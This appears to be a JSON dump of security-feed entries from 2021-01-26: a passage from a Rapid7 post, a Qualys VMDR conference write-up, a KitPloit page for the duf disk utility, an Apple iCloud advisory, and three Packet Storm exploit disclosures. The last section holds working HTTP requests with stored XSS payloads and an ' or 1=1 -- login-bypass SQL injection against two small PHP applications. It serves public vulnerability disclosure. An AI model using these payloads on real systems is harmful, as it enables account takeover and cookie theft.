targeted, we recommend that you compartmentalize your research activities using separate physical or virtual machines for general web browsing, interacting with others in the research community, accepting files from third parties and your own security research.\u201d_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "modified": "2021-01-26T15:01:33", "published": "2021-01-26T15:01:33", "id": "RAPID7BLOG:BE902C7628D3F969596F8BE1DD0207C1", "href": "https://blog.rapid7.com/2021/01/26/state-sponsored-threat-actors-target-security-researchers/", "type": "rapid7blog", "title": "State-Sponsored Threat Actors Target Security Researchers", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-01-26T12:31:02", "bulletinFamily": "blog", "cvelist": [], "description": "Qualys devoted the second day of the [Qualys Security Conference](<https://www.qualys.com/qsc/>) entirely to vulnerability management, detection and response (VMDR), a critical area for the security and compliance of hybrid cloud IT environments.\n\nMehul Revankar, VP of Product Management and Engineering for [VMDR](<https://www.qualys.com/subscriptions/vmdr/>) at Qualys, set the tone with the day\u2019s opening keynote, titled \u201cRisk-Based Vulnerability Management: Myth or Reality?\u201d\n\n### The Qualys Approach to VMDR\n\n\u201cYou can\u2019t protect what you don\u2019t see,\u201d Revankar said in reference to the importance of having an always updated, global IT asset inventory.\n\nThe rapid expansion of the IT infrastructure has increased the variety of IT assets that must be inventoried and protected, including containers, cloud services, and IoT devices. \u201cTraditional enterprise discovery tools can\u2019t keep up,\u201d Revankar said, adding that they are either not designed for these types of modern IT assets, or their scope is too narrow.\n\nRelying on seldom-updated CMDBs isn\u2019t the answer, as their data is often outdated, and trying to manually group and classify assets doesn\u2019t scale. \u201cGetting a handle on your assets is a difficult problem to solve,\u201d he said.\n\nWith the increase in the number and type of assets comes an inevitable jump in vulnerabilities in the IT environment. To make matters worse, malicious hackers every day move faster at exploiting recently disclosed vulnerabilities, upping the ante for security teams.\n\nTrying to get a handle on vulnerabilities with traditional scanning falls short, because increasingly many types of assets are outside of the scope of these appliances.\n\n \n[Register for QSC](<https://www.qualys.com/qsc/register/emea/>) to watch Mehul Revankar&#x27;s presentation and over 55 other sessions. There is no cost, and all sessions are available on demand starting a few hours after the live stream ends.\n\nLikewise, prioritizing which vulnerabilities to tackle urgently can\u2019t be based solely on their CVSS (Common Vulnerability Scoring System) scores, as such an approach is devoid of risk context. \u201cRisk-based vulnerability management is a reality, but it\u2019s a myth that it can be achieved based on CVE attributes,\u201d he said. The context is key, and \u201cprioritization needs real-time threat intelligence and asset context.\u201d\n\nMeanwhile, remediation must be thought of in a broader sense than just patching, as the time to remediate continues to lag the time to exploit. Security teams also must consider mitigation options, such as blocking access to an asset, or re-configuring it so it\u2019s hardened, in order to cut the risk until, and if, a patch can be applied.\n\nSometimes the best solution isn\u2019t to patch a piece of software, but rather retire it entirely from the environment, by, for example, standardizing on one browser, instead of allowing employees to use three or four different ones, he said. It\u2019s also important to be strategic when patching. \u201cWe can continue to blindly patch, or instead patch smartly,\u201d Revankar said. For example, a recent patch for Google Chrome -- 86.0.4240.111 -- superseded 189 different Chrome versions from 2020 alone, covering 174 vulnerabilities.\n\n### Jabil\u2019s VM Journey with Qualys\n\nJabil, a large global manufacturing solutions provider with presence in 30 countries, has evolved its vulnerability management practices over the past several years with Qualys.\n\nWhen Chris Ong, Jabil\u2019s Manager of Information Security Solution Engineering, arrived at the company five years ago, Jabil was doing scanning for vulnerabilities across its global data centers with Qualys appliances.\n\nThis approach had some limitations and complications. Given the large number of assets, the scans took up a lot of network bandwidth, and sometimes would interfere with other devices, like electrical doors. They often also took a lot of time, and required tweaks to the company\u2019s firewalls, so scan jobs sometimes wouldn\u2019t complete. In addition, certain users, such as telecommuters, would often miss the scan windows, so their devices wouldn\u2019t be included.\n\nAll of this changed when in early 2019, Jabil deployed 80,000 Qualys Cloud Agents to complement their appliance-based scanning. Because the agents are lightweight and only report changes on the assets they monitor, the network bandwidth issues disappeared, as well as any significant CPU impact on the devices.\n\n \nTo watch Chris Ong&#x27;s keynote, [register for QSC](<https://www.qualys.com/qsc/register/emea/>). \nThere is no cost, and your account gives you access to all sessions for the entire conference.\n\nIn addition, security improved because Cloud Agents are constantly monitoring the assets they\u2019re housed in, and beam data back to the Qualys Cloud Platform immediately. For that same reason, coverage of remote users and their devices improved significantly. \u201cYou\u2019re improving your ability to track the security and vulnerabilities on those assets, and you get that content to the patching team for remediation,\u201d Ong said during his QSC USA 2020 presentation. \u201cWe sealed the gap of appliance-based scanning,\u201d he added.\n\nThis also resulted in more complete metrics about assets and vulnerabilities, which pleased senior executives at Jabil who now had access to more fresh and comprehensive data. \u201cThat was a home run for us,\u201d Ong said.\n\nIn this same vein, Jabil also started leveraging Qualys\u2019 dynamic and customizable dashboards to make security data available to different audiences \u2013 from IT staffers to line-of-business leaders. Gone are the 800-page vulnerability reports.\n\nBy leveraging Qualys APIs, Jabil integrated Qualys with third-party tools, like its ticket management system and Splunk, helping streamline and automate workflows. \u201cWe have the right tool, and we have the right processes. Vulnerabilities are being reduced, and that makes Jabil\u2019s security posture a lot safer,\u201d Ong said.\n\nLooking ahead, Jabil is looking to extend its Qualys use to secure more types of assets, including ICS/SCADA systems, certificates, containers and IoT devices. It has also been using the new Qualys VMDR, and Ong and his team are impressed and delighted with the product \u2013 the next generation of Qualys&#x27; vulnerability management solution.\n\n### Qualys VMDR\n\nIt\u2019s with all these challenges in mind that Qualys released this year [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), an all-in-one solution to discover, assess, prioritize and remediate critical vulnerabilities.\n\n\n\nQualys VMDR brings it all together in a unified, central console with dynamic and customizable dashboards, for full visibility of the organization\u2019s security posture. \u201cThis gives you a single pane of glass to view your entire infrastructure and is customizable based on how you want to see your data,\u201d he said.\n\n### A Sneak Peek at the Future\n\nAfter a demo of Qualys VMDR, Revankar highlighted some upcoming additions and enhancements to the product.\n\nIn the area of vulnerability and asset prioritization, Qualys VMDR will gain a vulnerability rating based on risk and impact on assets, as well as the ability to automatically discover and classify the most critical and riskiest assets in your organization. Qualys VMDR will also gain new real-time threat indicators and improve its attack surface mapping capabilities. \u201cWe\u2019ve already made a lot of strides to allow customers to prioritize the right set of vulnerabilities and assets, and we want to take it further,\u201d he said.\n\nQualys VMDR will also tighten its patch deployment function by enforcing strict role-based access control, and extend its integration with ticketing services such as ServiceNow. A new remediation console is also in the works.\n\nAnother target for enhancement is the solution\u2019s ability to import and merge asset and vulnerability data from third-party sources, according to Revankar, in order to provide a consolidated risk view across the entire infrastructure.\n\n### VMDR Resources\n\nView these and all other sessions at [Qualys Security Conference](<https://www.qualys.com/qsc/>).\n\n * [VMDR eBook](<https://www.qualys.com/docs/vmdr-ebook.pdf>)\n * [VMDR Video Library](<https://www.qualys.com/training/library/vmdr/>)\n * [VMDR Community](<https://community.qualys.com/vmdr/>)\n * [VMDR Getting Started Guide](<https://www.qualys.com/docs/qualys-vmdr-getting-started-guide.pdf>)\n * [VMDR Free Trial](<https://www.qualys.com/forms/vmdr/>)", "modified": "2021-01-26T12:00:00", "published": "2021-01-26T12:00:00", "id": "QUALYSBLOG:437791A2F9E42EEB55067E078944FD60", "href": "https://blog.qualys.com/category/product-tech", "type": "qualysblog", "title": "Dive Deep into VMDR", "cvss": {"score": 0.0, "vector": "NONE"}}], "kitploit": [{"lastseen": "2021-01-26T17:32:32", "bulletinFamily": "tools", "cvelist": [], "description": "[  ](<https://1.bp.blogspot.com/-sCre0v4C4lM/YAujYNgPbCI/AAAAAAAAVEM/WF5_2JongVcsMvsCWxa29KHO7V7qSDqJwCNcBGAsYHQ/s1122/duf_5_duf.png>)\n\n \n\n\nDisk Usage/Free Utility (Linux, BSD, macOS &amp; Windows) \n\n \n** Features ** \n\n\n * User-friendly, colorful output \n * Adjusts to your terminal's width \n * Sort the results according to your needs \n * Groups &amp; filters devices \n * Can conveniently output JSON \n\n \n\n\n** Installation ** \n \n** Packages ** \n \n** Linux ** \n\n\n * Arch Linux: [ duf ](<https://aur.archlinux.org/packages/duf/> \"duf\" )\n * Nix: ` nix-env -iA nixpkgs.duf `\n * [ Packages ](<https://github.com/muesli/duf/releases> \"Packages\" ) in Alpine, [ Debian ](<https://www.kitploit.com/search/label/Debian> \"Debian\" ) &amp; RPM formats \n \n** BSD ** \n\n\n * FreeBSD: ` pkg install duf `\n \n** macOS ** \n\n\n * with [ Homebrew ](<https://brew.sh/> \"Homebrew\" ) : ` brew install duf `\n * with [ MacPorts ](<https://www.macports.org> \"MacPorts\" ) : ` sudo port selfupdate && sudo port install duf `\n \n** Windows ** \n\n\n * with [ scoop ](<https://scoop.sh/> \"scoop\" ) : ` scoop install duf `\n \n** Android ** \n\n\n * Android (via termux): ` pkg install duf `\n \n** Binaries ** \n\n\n * [ Binaries ](<https://github.com/muesli/duf/releases> \"Binaries\" ) for Linux, FreeBSD, OpenBSD, macOS, Windows \n \n** From source ** \n\n\nMake sure you have a working Go environment (Go 1.12 or higher is required). See the [ install instructions ](<https://golang.org/doc/install.html> \"install instructions\" ) . \n\nCompiling duf is easy, simply run: \n \n \n git clone https://github.com/muesli/duf.git \n cd duf \n go build \n \n\n \n** Usage ** \n\n\nYou can simply start duf without any command-line arguments: \n \n \n duf \n \n\nIf you supply arguments, duf will only list specific devices &amp; mount points: \n \n \n duf /home /some/file \n \n\nIf you want to list everything (including pseudo, duplicate, inaccessible file systems): \n \n \n duf --all \n \n\nYou can show and hide specific tables: \n \n \n duf --only local,network,fuse,special,loops,binds \n duf --hide local,network,fuse,special,loops,binds \n \n\nYou can also show and hide specific filesystems: \n \n \n duf --only-fs tmpfs,vfat \n duf --hide-fs tmpfs,vfat \n \n\nSort the output: \n \n \n duf --sort size \n \n\nValid keys are: ` mountpoint ` , ` size ` , ` used ` , ` avail ` , ` usage ` , ` inodes ` , ` inodes_used ` , ` inodes_avail ` , ` inodes_usage ` , ` type ` , ` filesystem ` . \n\nShow or hide specific columns: \n \n \n duf --output mountpoint,size,usage \n \n\nValid keys are: ` mountpoint ` , ` size ` , ` used ` , ` avail ` , ` usage ` , ` inodes ` , ` inodes_used ` , ` inodes_avail ` , ` inodes_usage ` , ` type ` , ` filesystem ` . \n\nList inode information instead of block usage: \n \n \n duf --inodes \n \n\nIf duf doesn't detect your terminal's colors correctly, you can set a theme: \n \n \n duf --theme light \n \n\nIf you prefer your output as JSON: \n \n \n duf --json \n \n\n \n** Troubleshooting ** \n\n\nUsers of ` oh-my-zsh ` should be aware that it already defines an alias called ` duf ` , which you will have to remove in order to use ` duf ` : \n \n \n unalias duf \n \n\n \n \n\n\n** [ Download Duf ](<https://github.com/muesli/duf> \"Download Duf\" ) **\n", "edition": 1, "modified": "2021-01-26T11:30:04", "published": "2021-01-26T11:30:04", "id": "KITPLOIT:5897810047989093720", "href": "http://www.kitploit.com/2021/01/duf-disk-usagefree-utility-linux-bsd.html", "title": "Duf - Disk Usage/Free Utility (Linux, BSD, macOS & Windows)", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}], "apple": [{"lastseen": "2021-01-27T04:43:09", "bulletinFamily": "software", "cvelist": ["CVE-2020-29617", "CVE-2020-29619", "CVE-2020-29611", "CVE-2020-29618"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## iCloud for Windows 12.0\n\nReleased January 26, 2021\n\n**ImageIO**\n\nAvailable for: Windows 10 and later via the Microsoft Store\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2020-29611: Ivan Fratric of Google Project Zero\n\n**ImageIO**\n\nAvailable for: Windows 10 and later via the Microsoft Store\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-29618: Xingwei Lin of Ant Security Light-Year Lab\n\n**ImageIO**\n\nAvailable for: Windows 10 and later via the Microsoft Store\n\nImpact: Processing a maliciously crafted image may lead to heap corruption\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2020-29617: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2020-29619: Xingwei Lin of Ant Security Light-Year Lab\n", "edition": 1, "modified": "2021-01-26T06:36:12", "published": "2021-01-26T06:36:12", "id": "APPLE:HT212145", "href": "https://support.apple.com/kb/HT212145", "title": "About the security content of iCloud for Windows 12.0 - Apple Support", "type": "apple", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-27T04:40:59", "bulletinFamily": "software", "cvelist": [], "description": "Apple recommends to install security update iCloud for Windows 12.0 on devices Windows 10 and later via the Microsoft Store", "edition": 1, "modified": "2021-01-26T00:00:00", "published": "2021-01-26T00:00:00", "id": "APPLE:BFD349E5E49560FAF25D384A4368BC91", "href": "https://support.apple.com/kb/HT212145", "title": "Apple Security Update: iCloud for Windows 12.0", "type": "apple", "cvss": {}}], "packetstorm": [{"lastseen": "2021-01-26T14:39:05", "description": "", "published": "2021-01-26T00:00:00", "type": "packetstorm", "title": "Simple Public Chat Room 1.0 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-26T00:00:00", "id": "PACKETSTORM:161125", "href": "https://packetstormsecurity.com/files/161125/Simple-Public-Chat-Room-1.0-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: Simple Public Chat Room | Authenticated Stored Cross-Site Scripting \n# Exploit Author: Richard Jones \n# Date: 2021-01-26 \n# Vendor Homepage: https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html \n# Software Link: https://www.sourcecodester.com/download-code?nid=12295&title=Simple+Public+Chat+Room+Using+PHP%2FMySQLi+with+Source+Code \n# Version: 1.0 \n# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 \n \n#Replicates across chat sessions.. \n \n \nPOST /chat/send_message.php HTTP/1.1 \nHost: localhost \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 \nAccept-Language: en-GB,en;q=0.5 \nAccept-Encoding: gzip, deflate \nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 \nContent-Length: 58 \nOrigin: http://localhost \nConnection: close \nCookie: PHPSESSID=r2focevhk11aqka051gt26qfhl \n \nmsg=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&id=1 \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161125/spcr10-xss.txt"}, {"lastseen": "2021-01-26T14:38:58", "description": "", "published": "2021-01-26T00:00:00", "type": "packetstorm", "title": "Simple Public Chat Room 1.0 SQL Injection", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-26T00:00:00", "id": "PACKETSTORM:161122", "href": "https://packetstormsecurity.com/files/161122/Simple-Public-Chat-Room-1.0-SQL-Injection.html", "sourceData": "`# Exploit Title: Simple Public Chat Room | Authentication Bypass Sqli \n# Exploit Author: Richard Jones \n# Date: 2021-01-26 \n# Vendor Homepage: https://www.sourcecodester.com/php/12295/simple-public-chat-room-using-php.html \n# Software Link: https://www.sourcecodester.com/download-code?nid=12295&title=Simple+Public+Chat+Room+Using+PHP%2FMySQLi+with+Source+Code \n# Version: 1.0 \n# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 \n \nPOST /chat/login.php HTTP/1.1 \nHost: TARGET \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 51 \nConnection: close \nReferer: http://localhost/chat/index.php?attempt= \nCookie: PHPSESSID=r2focevhk11aqka051gt26qfhl \nUpgrade-Insecure-Requests: 1 \n \nusername=aa%27+or+1%3D1+--&password=%27+or+1%3D1+-- \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161122/spcr10-sql.txt"}, {"lastseen": "2021-01-26T14:39:12", "description": "", "published": "2021-01-26T00:00:00", "type": "packetstorm", "title": "Daily Expense Tracker System 1.0 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-01-26T00:00:00", "id": "PACKETSTORM:161114", "href": "https://packetstormsecurity.com/files/161114/Daily-Expense-Tracker-System-1.0-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: Daily Expense Tracker System Stored Cross-Site Scripting \nVulnerability \n# Date: 2021-01-26 \n# Exploit Author: Priyanka Samak \n# Vendor Homepage: https://phpgurukul.com/ \n# Software Link: \nhttps://phpgurukul.com/daily-expense-tracker-using-php-and-mysql/ \n# Software: : Daily Expense Tracker System # Version : 1.0 \n# Vulnerability Type: Cross-site Scripting \n# Vulnerability: Stored XSS \n# Tested on Windows 10 \n# This application is vulnerable to Stored XSS vulnerability. \n# Vulnerable script: \n1) http://localhost/dets/user-profile.php \n2)http://localhost/dets/add-expense.php \n# Vulnerable parameters: \u2018Full Name' and 'Item\u2019 \n# Payload used: <script>alert(\u2018document.cookie\u2019)</script> \n# POC: When you view the details under the Manage Expense tab and User \nProfile tab \n# You will see your Javascript code executes. \n \n \nThanks and Regards, Priyanka Samak \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161114/dets10-xss.txt"}]}